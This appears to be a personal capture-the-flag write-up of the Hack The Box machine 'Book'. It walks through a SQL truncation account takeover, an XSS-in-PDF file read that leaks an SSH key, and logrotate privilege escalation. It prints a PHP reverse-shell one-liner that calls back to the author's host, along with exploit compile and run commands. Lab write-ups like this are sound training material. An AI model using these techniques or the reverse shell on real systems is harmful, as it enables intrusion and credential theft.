Book is a hard Linux machine in Hack the box which got retired very recently.
If you don't know what hack the box is, it is an online platform that enables us to develop our skills in pentesting through live machines and other challenges.
Take a tour:
Hack The Box :: Penetration Testing Labs
Hack The Box provides a wealth of information and experience for your security team. Train your employees or find new…
This is my first write-up on a HTB machine.
As usual, I started with nmap scan
Parallel to that task, I also initiated a directory search with the dirsearch tool.
Form the initial enumeration, I found that port 80 is open.
We have option to sign up and sign in. Initially, I tried with some basic SQL injection, but nothing happened. So I just signed up and did a stroll through the website. I was able to see a book submission portal with a file upload. I tried uploading some payloads through that but nothing worked.
I was sure that the book submission portal has something important to do with the box. But nothing was happening here also.
When I was inspecting the page source of 10.10.10.176/index, I found something interesting.
Yeah!! that's my ticket
Here, the size should not be greater than 20 characters. So if I give an email address with 21 characters, I can set a new password for any user and signup. You can read more about this attack from below link
SQL Truncation Attack
The SQL Truncation vulnerability is a very interesting flaw in the database. The successful exploitation of this issue…
I used Burp Suite to capture the request and alter the email address to 21characters long one.
In the above image at line 16, after the email address, I have added a few spaces followed by “z” which makes it a total of 21 characters.
Once this account creation is successful, I can log in with
Pass: admin -> which I recently set
I logged as admin via http://10.10.10.176/admin which I got from directory search.
After navigating through the admin page, I found a few pdf under users and collection
After some research, I found the below attack which is very useful and decided to try it.
Local File Read via XSS in Dynamically Generated PDF
Hello Hunters, This time I am writing about a Vulnerability found in another private program(xyz.com) on Bugcrowd which…
From the user account’s book submission portal I added the below script and uploaded a dummy text file along with it
After checking the ‘collections’ PDF from the admin account, I found the below PDF.
Yes, it's working!!
we found a user named reader
Then I decided to give a try to extract the RSA key using the same method.
By default, ssh key will be available at /home/.ssh/id_rsa. I edited the script and again send the request through the user profile
I used the below-mentioned python tool to extract the key from PDF file.
Pdfminer.six is a community maintained fork of the original PDFMiner. It is a tool for extracting information from PDF…
sudo python3 pdf2txt.py -o readerkey /home/d3r1c/HTB/Book/28942.pdf
we will get the private key of reader
I copied the ssh key to a file id_rsa. After setting up permission using chmod, I tried accessing the reader through SSH
ssh -i id_rsa email@example.com
we own the user!
Now, its time to find a way to escalate the privilege.
Here, I used a tool named “pspy” which is used for unprivileged Linux process inquiry. You can install and read this about in below link
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see…
using simpleHttpsServer with python, I downloaded pspy to the target machine and enabled it with executable permission.
By checking the logs from this, I found logrotate is running
logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.
logrotate(8) - Linux man page
logrotate - rotates, compresses, and mails system logs logrotate is designed to ease administration of systems that…
From Github, I found an exploit for logrotate
Contribute to whotwagner/logrotten development by creating an account on GitHub.
I copied the entire code into logrotten.c and enables execution permission with “chmod 700 logrotten.c”
gcc -o logrotten logrotten.c
the binary will be stored as logrotten
After that I created a payload file with a PHP reverse shell in
php -r ‘$sock=fsockopen(“10.10.14.195”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
After that, I executed the logrotten binary with payload
./logrotten -p ./payload /home/reader/backups/access.log
A netcat session was also arranged to capture the reverse shell on my Linux(10.10.14.195) at port 1234
Once I got the reverse shell, which was not persistent, I ran the below command.
PS: Here I missed the reverse shell twice. So the third time I was ready with “cat” command
Once I got this, I made a new file named book_id_rsa and copied the RSA key into it and tried to gain as root using
ssh -i book_id_rsa firstname.lastname@example.org
We got the root!
Just let me know if you have any doubts
If you found this write-up useful, you can respect me on HTB